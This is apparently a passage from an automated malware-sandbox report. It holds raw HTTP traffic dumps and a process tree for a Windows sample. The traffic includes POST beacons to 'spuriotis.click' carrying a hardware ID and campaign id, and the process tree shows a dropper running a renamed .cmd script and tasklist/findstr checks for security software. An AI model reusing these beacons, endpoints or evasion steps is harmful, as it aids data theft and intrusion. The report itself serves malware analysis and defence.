                                                                                                                                                                        Data Ascii: 7!U(4>Waz3d2s&,n;HP5pTLwH1=X=o&ZFTh5SI-pk2^H73)"+*F0QXQ`TT$v$#!*0_ZWSp"UGit{,H]@@bna!2I t3M&9{}y/c?y
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 94 97 70 af 58 d1 5e c9 18 9a 3a 02 f2 14 e2 42 bb 5c 36 de cf bd 0c 32 da 95 6a 83 0e 7b d9 a4 3b c6 1d cc 48 b5 cf 8c dc 2f db 6c ab f7 a4 fa 29 a6 5f 49 05 0e 80 0e fe f5 8f 6e 14 31 5b 75 98 79 16 f1 f7 15 4c f2 3c 23 9d 9d cb c2 7b fb 40 bf 56 0b 93 90 75 68 6c 76 2e 70 70 8e ea 42 34 3f a0 4f 0a d5 4b 38 b4 21 28 ca 0b a6 39 c4 94 44 85 d7 5f 08 73 a3 a2 14 63 be f4 ea db bf e4 af 51 1a 6e 43 58 61 a1 98 13 0e 43 55 2f 9f e0 5b 78 75 ca 14 b7 22 23 f9 8e f3 61 bd 32 54 55 66 d6 c1 30 23 7e 6b 0b 78 c6 d8 d1 f3 76 62 7c 38 bc fa e4 0f dd 28 52 07 0b 15 cb 78 b1 c4 c5 82 62 99 52 e1 f5 b3 16 54 55 f4 35 04 a5 79 45 e0 99 24 57 35 48 28 6e dd db 95 09 7a 41 80 00 f7 9d b6 a0 dc 8f 6d 67 35 ed 22 91 1e c1 fa b8 e6 55 6d a6 aa 9a 4a 4e d6 d5 b1 9f b2 ee
                                                                                                                                                                        Data Ascii: pX^:B\62j{;H/l)_In1[uyL<#{@Vuhlv.ppB4?OK8!(9D_scQnCXaCU/[xu"#a2TUf0#~kxvb|8(RxbRTU5yE$W5H(nzAmg5"UmJN
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 8d 0d 69 d6 19 43 bd 3e 9b 05 28 b5 82 a4 4d 18 12 e6 68 81 fa d0 99 e1 ea 66 88 8a 43 24 63 78 ae ef e6 a7 5a be 2e cc fb 0e f2 87 7a 17 07 fc 3c c3 e7 7a 57 ab f6 9e d6 0a 9a fd 4c f6 9b c5 d0 87 cc 39 31 59 a7 1a e9 74 bf 57 fe 6c ee 5d 7f 36 cf 60 6c 56 97 c2 52 27 fe a7 36 b0 97 f8 05 3d ce f6 81 f8 34 31 ca 38 c4 ea b6 21 4f 99 cf 7f 28 2c fd 1d ec 3e 2e fe 71 62 fd 0d 0a b8 0d 0f 0e b0 af 03 79 52 76 75 e4 4c e3 ec 86 23 7d a8 3f 9c d5 ce 42 a0 40 b8 ff f2 c2 b5 8d 08 f7 db 40 af 14 08 0a 02 f7 61 cf 49 04 3c b0 d3 05 1e f8 03 e6 0f 0b dc c2 e3 aa ab b5 8e 85 73 12 20 b2 5c 06 ac 10 f8 7d 3b 67 05 41 3f 6a 35 66 29 65 7e ee 81 e7 63 3f 7b b3 e5 7b ce 95 37 8a cb 9b ac 98 91 ce 89 1f 2e 02 c3 33 04 da 13 c0 ba 1f 0d 3b ef 02 19 7b 1c fe 77 5c ac 73
                                                                                                                                                                        Data Ascii: iC>(MhfC$cxZ.z<zWL91YtWl]6`lVR'6=418!O(,>.qbyRvuL#}?B@@aI<s \};gA?j5f)e~c?{{7.3;{w\s
                                                                                                                                                                        2024-12-28 08:57:16 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:15 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=jpel6f0bjos5pmk7g0d6sbj5vq; expires=Wed, 23 Apr 2025 02:43:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYv7O8eVsUd9srbZxRgfzaOJfUNGIHWx7tMtjD0VRy0l%2BhSkJ%2BLYAskWobh%2BqSmEsnJhsbsNt3vgClLy1fR5YuAYaDdL70YFLEpz0oH8WYi0xrogjoDaxT8ZN%2F%2F6hbPJEVs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f90577549744328-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2423&min_rtt=2416&rtt_var=921&sent=325&recv=594&lost=0&retrans=0&sent_bytes=2832&recv_bytes=574429&delivery_rate=1179321&cwnd=220&unsent_bytes=0&cid=4247e5a3aa7303dc&ts=2485&x=0"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.1249728104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:17 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 80
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:17 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=8B0503D077510067D9AC212D15D33917
                                                                                                                                                                        2024-12-28 08:57:18 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:18 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=pm01m7n4n6bgf41hmqheac07mq; expires=Wed, 23 Apr 2025 02:43:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Q3AHt1bqpb2xxmn4PbKyi%2BMGmy1eM3wObIVLemoquQKd5YHv%2B%2B%2BeDb0h7PpHel0C9bGz4qE4oKOoHWB%2FsPWfbH%2Bie0whhX3qKAc4R3PDbVtuXHuxv5K0%2FVTPIsK6ZxfJc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f90578d684a4231-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1741&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1638608&cwnd=127&unsent_bytes=0&cid=7dddf357d2feb4a1&ts=807&x=0"
                                                                                                                                                                        2024-12-28 08:57:18 UTC238INData Raw: 33 36 39 30 0d 0a 54 2f 4a 38 57 38 33 76 34 2b 69 7a 6c 56 7a 4c 71 43 34 4a 5a 6f 4b 49 71 45 47 6e 35 5a 6c 6a 36 67 36 7a 68 31 59 6c 4d 78 34 55 69 56 34 39 75 63 33 5a 32 5a 2b 33 4f 65 6d 53 48 79 56 45 35 71 71 53 59 2f 2f 54 31 44 65 47 61 63 76 53 41 6c 52 64 52 79 53 61 50 68 61 6d 6f 4b 75 77 2f 4d 55 62 6f 4d 31 58 62 52 37 71 79 65 6b 4d 6b 74 33 33 49 4a 70 65 30 76 38 66 61 45 42 4e 5a 4b 55 4a 44 49 6d 35 73 61 66 43 38 53 57 59 37 57 74 77 4e 37 62 73 79 33 57 66 68 4d 74 55 6f 44 33 30 77 68 64 6b 53 6e 41 32 6b 54 63 77 39 4a 32 6d 6a 38 71 6b 64 36 48 74 47 31 41 72 31 4d 32 65 4d 5a 57 76 30 44 4b 2b 52 50 66 76 5a 31 39 5a 5a 6a 2b 36 44 7a 57 75 74 72 4b 70 39 39 6f 36 67 64 39 66
                                                                                                                                                                        Data Ascii: 3690T/J8W83v4+izlVzLqC4JZoKIqEGn5Zlj6g6zh1YlMx4UiV49uc3Z2Z+3OemSHyVE5qqSY//T1DeGacvSAlRdRySaPhamoKuw/MUboM1XbR7qyekMkt33IJpe0v8faEBNZKUJDIm5safC8SWY7WtwN7bsy3WfhMtUoD30whdkSnA2kTcw9J2mj8qkd6HtG1Ar1M2eMZWv0DK+RPfvZ19ZZj+6DzWutrKp99o6gd9f
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 57 69 6e 78 32 2b 77 4e 38 6f 66 67 45 34 64 50 79 65 41 45 46 32 63 72 42 4a 6f 35 47 70 57 4d 6f 4b 7a 6d 33 7a 61 54 2f 78 39 71 49 72 53 36 7a 47 72 50 6c 4d 30 4b 6b 6a 76 56 34 51 4a 55 59 6d 77 6f 77 54 51 68 67 61 79 36 33 38 76 4a 63 36 47 66 53 47 51 63 31 2f 72 48 45 50 36 4c 31 42 43 4d 58 39 2b 73 4d 57 52 79 5a 33 79 59 4d 52 43 6d 6d 70 47 70 32 4f 78 75 76 65 52 4c 56 55 6e 48 78 66 34 45 6b 5a 57 72 4b 61 4e 66 35 38 38 53 54 51 4a 4d 49 63 51 4d 41 35 69 42 67 4c 4c 69 31 42 69 45 7a 6d 70 2b 46 39 61 36 32 78 4c 6a 71 63 46 55 70 31 72 66 34 43 35 67 5a 32 38 68 71 78 63 7a 6a 36 4b 49 70 2f 76 4e 46 35 76 76 48 6d 77 66 35 76 44 41 4a 75 61 6f 72 51 43 45 54 63 50 58 4e 31 31 36 55 7a 75 6f 45 79 4f 43 75 4b 65 75 34 64 6f 74 72 38 4a
                                                                                                                                                                        Data Ascii: Winx2+wN8ofgE4dPyeAEF2crBJo5GpWMoKzm3zaT/x9qIrS6zGrPlM0KkjvV4QJUYmwowTQhgay638vJc6GfSGQc1/rHEP6L1BCMX9+sMWRyZ3yYMRCmmpGp2OxuveRLVUnHxf4EkZWrKaNf588STQJMIcQMA5iBgLLi1BiEzmp+F9a62xLjqcFUp1rf4C5gZ28hqxczj6KIp/vNF5vvHmwf5vDAJuaorQCETcPXN116UzuoEyOCuKeu4dotr8J
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 66 6e 38 63 39 53 32 33 53 2b 79 4f 50 37 54 4f 6b 4a 4c 53 78 75 44 45 67 4b 6d 68 36 47 6c 32 4e 6f 55 6b 2b 64 2b 54 67 33 6e 38 63 77 35 7a 36 54 59 4c 74 38 32 33 63 51 6d 64 56 4a 6d 42 72 38 49 50 61 4b 58 72 4c 2f 33 30 77 36 45 32 55 70 67 4e 63 66 4e 30 52 43 54 67 66 70 58 30 6d 2f 68 73 42 77 57 64 46 73 4f 73 77 59 31 74 49 79 6f 67 34 72 6e 47 61 7a 52 48 79 49 4d 78 37 33 78 44 50 47 67 72 78 50 59 52 50 72 57 41 6d 39 33 64 6e 36 49 46 69 4f 39 70 35 43 47 30 4d 77 4e 69 75 78 68 62 79 7a 31 2b 66 78 7a 31 4c 62 64 4c 37 49 34 2f 74 4d 36 51 6b 74 4c 47 34 4d 53 41 71 61 48 6f 61 58 59 32 68 53 54 35 33 35 4f 44 65 66 78 7a 44 6e 50 70 4e 67 75 33 7a 62 64 78 43 5a 31 55 6d 59 47 76 77 67 39 6f 70 65 73 76 2f 66 54 44 6f 54 5a 53 6d 41 31
                                                                                                                                                                        Data Ascii: fn8c9S23S+yOP7TOkJLSxuDEgKmh6Gl2NoUk+d+Tg3n8cw5z6TYLt823cQmdVJmBr8IPaKXrL/30w6E2UpgNcfN0RCTgfpX0m/hsBwWdFsOswY1tIyog4rnGazRHyIMx73xDPGgrxPYRPrWAm93dn6IFiO9p5CG0MwNiuxhbyz1+fxz1LbdL7I4/tM6QktLG4MSAqaHoaXY2hST535ODefxzDnPpNgu3zbdxCZ1UmYGvwg9opesv/fTDoTZSmA1
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 58 67 74 4b 6b 4a 6a 6b 75 43 79 42 6c 57 57 6c 6f 4a 69 41 38 36 6d 59 79 45 69 63 4b 6b 43 4c 50 43 66 45 78 54 38 64 53 48 47 4d 33 53 6f 41 4c 54 59 39 4c 76 45 6b 46 38 54 67 66 4b 4c 42 57 48 6e 4b 57 6e 67 4f 38 49 6d 4a 78 66 66 67 43 78 73 63 31 7a 31 4e 7a 36 4d 71 56 73 2f 66 45 65 53 57 63 72 4c 5a 74 4f 4e 4c 32 6d 69 6f 33 33 6f 57 76 7a 35 6b 51 34 42 4b 6e 5a 38 54 44 31 6a 61 77 5a 68 32 58 6b 31 79 52 67 59 48 4d 59 67 68 59 74 76 74 33 61 6d 39 2f 36 4f 50 2f 4d 63 69 59 4d 35 4f 6d 63 4e 4f 54 64 32 77 6a 59 58 75 44 6b 5a 57 6c 43 64 52 62 42 4f 6a 53 48 67 72 72 65 68 65 59 61 6b 73 5a 6c 62 46 44 34 36 74 42 30 78 4b 50 2f 4a 4c 39 72 79 65 51 4f 45 56 35 48 4a 73 51 79 41 59 71 66 73 34 6e 4c 33 42 47 34 6e 57 64 4f 54 63 37 4d 78
                                                                                                                                                                        Data Ascii: XgtKkJjkuCyBlWWloJiA86mYyEicKkCLPCfExT8dSHGM3SoALTY9LvEkF8TgfKLBWHnKWngO8ImJxffgCxsc1z1Nz6MqVs/fEeSWcrLZtONL2mio33oWvz5kQ4BKnZ8TD1jawZh2Xk1yRgYHMYghYtvt3am9/6OP/MciYM5OmcNOTd2wjYXuDkZWlCdRbBOjSHgrreheYaksZlbFD46tB0xKP/JL9ryeQOEV5HJsQyAYqfs4nL3BG4nWdOTc7Mx
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 7a 43 35 31 39 35 63 45 31 64 41 70 39 42 4c 30 79 47 6f 71 6b 6c 5a 69 4b 78 68 69 48 2f 57 78 59 4e 4c 72 42 78 52 54 32 74 71 6b 48 67 58 62 78 79 68 4e 63 59 30 67 37 71 42 63 35 39 5a 71 6e 6b 65 44 73 48 72 72 79 61 6c 30 2f 38 37 2f 2b 43 38 69 53 36 51 65 6d 59 75 62 33 50 6b 52 37 55 42 57 69 46 6d 75 6d 32 4c 43 6a 68 4f 55 49 6e 4d 51 62 4f 7a 50 7a 34 75 4d 47 34 39 58 79 50 38 56 32 33 4f 4e 6d 63 55 46 39 44 6f 74 4d 63 4c 36 35 6a 39 7a 33 6f 57 2b 58 68 33 35 52 4d 64 44 6b 67 77 50 79 30 36 73 76 6b 32 4c 42 7a 79 56 4c 62 7a 45 43 6c 6b 51 7a 72 4c 2b 58 6b 64 75 68 4b 35 2f 63 46 6a 6c 54 38 75 66 38 4c 63 43 66 36 78 65 47 56 39 33 6c 4e 78 4d 46 66 44 66 47 45 32 76 6d 6c 61 43 67 35 74 41 45 2f 38 56 33 59 46 44 4d 30 75 38 78 39 34
                                                                                                                                                                        Data Ascii: zC5195cE1dAp9BL0yGoqklZiKxhiH/WxYNLrBxRT2tqkHgXbxyhNcY0g7qBc59ZqnkeDsHrryal0/87/+C8iS6QemYub3PkR7UBWiFmum2LCjhOUInMQbOzPz4uMG49XyP8V23ONmcUF9DotMcL65j9z3oW+Xh35RMdDkgwPy06svk2LBzyVLbzEClkQzrL+XkduhK5/cFjlT8uf8LcCf6xeGV93lNxMFfDfGE2vmlaCg5tAE/8V3YFDM0u8x94
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 66 39 36 7a 4d 32 35 36 53 78 2b 6c 53 41 2b 55 78 4a 4f 44 2b 73 55 54 72 66 4a 65 51 68 44 79 73 66 73 46 36 36 72 4b 49 5a 78 34 34 72 49 44 55 67 74 4b 4c 73 64 58 41 35 32 4e 67 62 2f 5a 30 44 2b 4a 77 32 5a 63 49 39 71 38 78 52 6a 4f 30 39 63 35 72 58 37 6a 35 69 35 73 66 6d 31 36 75 7a 74 77 6e 4c 69 6c 76 50 65 6a 4f 4c 6e 47 47 32 6f 68 34 66 4b 63 4a 64 47 4b 33 42 6d 53 52 39 33 41 45 30 49 4c 64 44 32 63 4e 68 4f 30 70 34 72 66 36 74 73 58 69 73 38 66 50 42 66 49 35 4f 30 45 77 64 54 56 41 70 74 61 36 63 4d 2b 46 45 6c 37 66 70 59 61 45 72 65 35 75 70 7a 31 72 42 76 2f 30 47 55 77 4c 38 76 63 33 48 6a 75 69 2f 56 52 69 31 62 47 30 6d 4a 57 64 55 63 68 74 53 6b 6a 6f 70 75 6b 6a 2f 6a 79 43 2b 44 76 53 33 4d 46 32 73 66 46 4e 75 71 48 38 53 32
                                                                                                                                                                        Data Ascii: f96zM256Sx+lSA+UxJOD+sUTrfJeQhDysfsF66rKIZx44rIDUgtKLsdXA52Ngb/Z0D+Jw2ZcI9q8xRjO09c5rX7j5i5sfm16uztwnLilvPejOLnGG2oh4fKcJdGK3BmSR93AE0ILdD2cNhO0p4rf6tsXis8fPBfI5O0EwdTVApta6cM+FEl7fpYaEre5upz1rBv/0GUwL8vc3Hjui/VRi1bG0mJWdUchtSkjopukj/jyC+DvS3MF2sfFNuqH8S2
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 6d 49 58 5a 6b 6f 46 74 68 52 71 74 34 61 37 6f 6f 66 63 43 59 6e 79 47 6c 6b 54 74 4f 62 6b 45 50 43 70 71 56 4c 63 57 2f 44 4d 50 52 59 46 63 43 6a 44 4b 51 2b 2b 73 38 79 77 32 63 38 4f 68 73 4e 68 51 54 37 4e 77 4e 49 77 39 39 50 32 46 59 4a 38 33 50 4e 6a 48 56 31 64 47 36 35 54 63 4f 61 2f 32 35 37 51 7a 42 36 44 79 30 74 4c 55 38 44 41 33 51 7a 42 67 36 30 7a 32 46 66 61 36 43 35 43 41 32 78 39 6f 54 46 73 70 49 69 2f 78 2f 75 73 4b 62 2f 4c 51 45 6f 41 36 74 32 65 65 4e 2b 47 77 53 79 36 56 73 57 32 4d 48 55 43 4b 6e 32 6e 4b 42 47 4a 68 39 4b 53 32 2b 77 4c 73 38 78 36 62 41 48 6b 77 4d 4e 31 34 61 37 4a 41 64 78 4c 30 4c 63 4d 52 77 42 59 4a 4b 63 52 41 72 6e 58 6b 4c 37 71 2b 7a 6d 5a 7a 47 70 6a 55 4e 72 51 35 77 6e 50 6b 36 45 69 6d 6a 66 48
                                                                                                                                                                        Data Ascii: mIXZkoFthRqt4a7oofcCYnyGlkTtObkEPCpqVLcW/DMPRYFcCjDKQ++s8yw2c8OhsNhQT7NwNIw99P2FYJ83PNjHV1dG65TcOa/257QzB6Dy0tLU8DA3QzBg60z2Ffa6C5CA2x9oTFspIi/x/usKb/LQEoA6t2eeN+GwSy6VsW2MHUCKn2nKBGJh9KS2+wLs8x6bAHkwMN14a7JAdxL0LcMRwBYJKcRArnXkL7q+zmZzGpjUNrQ5wnPk6EimjfH
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 70 54 47 62 38 49 50 50 79 58 67 6f 37 6e 7a 78 69 6a 2f 30 5a 64 4f 71 32 2b 7a 67 50 4e 73 38 4d 4b 70 45 50 38 72 42 46 30 5a 53 30 32 68 41 30 53 70 72 66 56 70 65 66 6a 5a 4c 6e 77 58 55 55 49 32 73 33 34 45 2b 71 4f 31 69 75 48 4f 6f 44 4e 4d 6b 51 43 53 41 43 32 48 79 71 4c 6f 36 61 48 32 38 4d 55 38 74 67 66 63 53 6a 33 36 63 59 5a 30 49 54 7a 4b 6f 56 6d 69 75 49 59 53 58 5a 6e 48 73 59 59 4f 50 6d 7a 7a 4a 72 69 79 58 4f 41 78 32 31 46 49 39 66 69 78 77 37 69 6f 2f 55 68 68 57 54 63 38 53 52 6d 55 6d 6b 46 6e 7a 55 43 69 4d 53 54 32 76 48 6a 48 72 37 45 5a 6e 31 55 7a 76 44 46 4d 65 2b 57 39 30 69 76 66 2f 65 78 50 6c 46 79 55 79 4f 2f 43 52 53 41 67 59 71 61 32 75 63 73 67 39 4a 47 66 6a 79 7a 2f 50 78 30 7a 62 66 32 4a 70 31 6f 35 76 51 50 63
                                                                                                                                                                        Data Ascii: pTGb8IPPyXgo7nzxij/0ZdOq2+zgPNs8MKpEP8rBF0ZS02hA0SprfVpefjZLnwXUUI2s34E+qO1iuHOoDNMkQCSAC2HyqLo6aH28MU8tgfcSj36cYZ0ITzKoVmiuIYSXZnHsYYOPmzzJriyXOAx21FI9fixw7io/UhhWTc8SRmUmkFnzUCiMST2vHjHr7EZn1UzvDFMe+W90ivf/exPlFyUyO/CRSAgYqa2ucsg9JGfjyz/Px0zbf2Jp1o5vQPc
                                                                                                                                                                        2024-12-28 08:57:18 UTC1369INData Raw: 46 4f 68 65 30 6c 37 53 43 30 73 38 46 2b 2f 35 71 61 42 61 31 2b 4f 49 47 38 36 75 75 43 34 64 61 32 63 4d 6d 59 51 4e 77 42 73 59 75 4d 6f 6d 6a 31 4b 4c 65 35 41 69 45 32 33 74 5a 4b 73 66 70 35 6a 62 4c 69 4d 4d 32 6a 6e 2f 65 73 54 31 4a 59 56 4d 33 6c 7a 73 63 67 71 4b 73 67 2f 76 57 4f 4c 50 53 56 44 68 51 32 75 6e 6e 65 65 36 7a 33 67 61 37 61 74 61 73 4e 78 5a 61 65 6e 61 63 48 6a 69 37 72 4e 4f 2b 67 75 55 6d 6d 63 70 47 66 77 33 34 32 38 34 64 69 4e 7a 4b 56 61 31 39 35 39 63 68 45 58 68 5a 64 34 6f 67 64 4c 32 38 71 4c 72 33 78 67 37 39 7a 52 78 56 53 63 48 59 2b 43 6a 41 69 4b 67 69 33 6b 66 62 31 32 52 53 43 31 6b 67 6f 79 51 4e 2b 49 57 47 32 4d 66 52 62 4a 7a 48 61 33 67 6a 79 37 47 44 4e 66 47 6a 2b 45 69 76 52 6f 58 54 47 6e 5a 66 57 69
                                                                                                                                                                        Data Ascii: FOhe0l7SC0s8F+/5qaBa1+OIG86uuC4da2cMmYQNwBsYuMomj1KLe5AiE23tZKsfp5jbLiMM2jn/esT1JYVM3lzscgqKsg/vWOLPSVDhQ2unnee6z3ga7atasNxZaenacHji7rNO+guUmmcpGfw34284diNzKVa1959chEXhZd4ogdL28qLr3xg79zRxVScHY+CjAiKgi3kfb12RSC1kgoyQN+IWG2MfRbJzHa3gjy7GDNfGj+EivRoXTGnZfWi


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:03:56:33
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\TNyOrM6mIM.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\TNyOrM6mIM.exe"
                                                                                                                                                                        Imagebase:0x850000
                                                                                                                                                                        File size:7'080'960 bytes
                                                                                                                                                                        MD5 hash:EC19FA1027FEE164803CC127AEF64199
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:03:56:34
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'062'983 bytes
                                                                                                                                                                        MD5 hash:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 11%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:03:56:35
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Set-up.exe"
                                                                                                                                                                        Imagebase:0x5e0000
                                                                                                                                                                        File size:6'851'208 bytes
                                                                                                                                                                        MD5 hash:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 70%, ReversingLabs
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:03:56:36
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:03:56:36
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff704000000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:03:56:37
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0xdb0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:03:56:37
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                        Imagebase:0x9a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:03:56:38
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0xdb0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
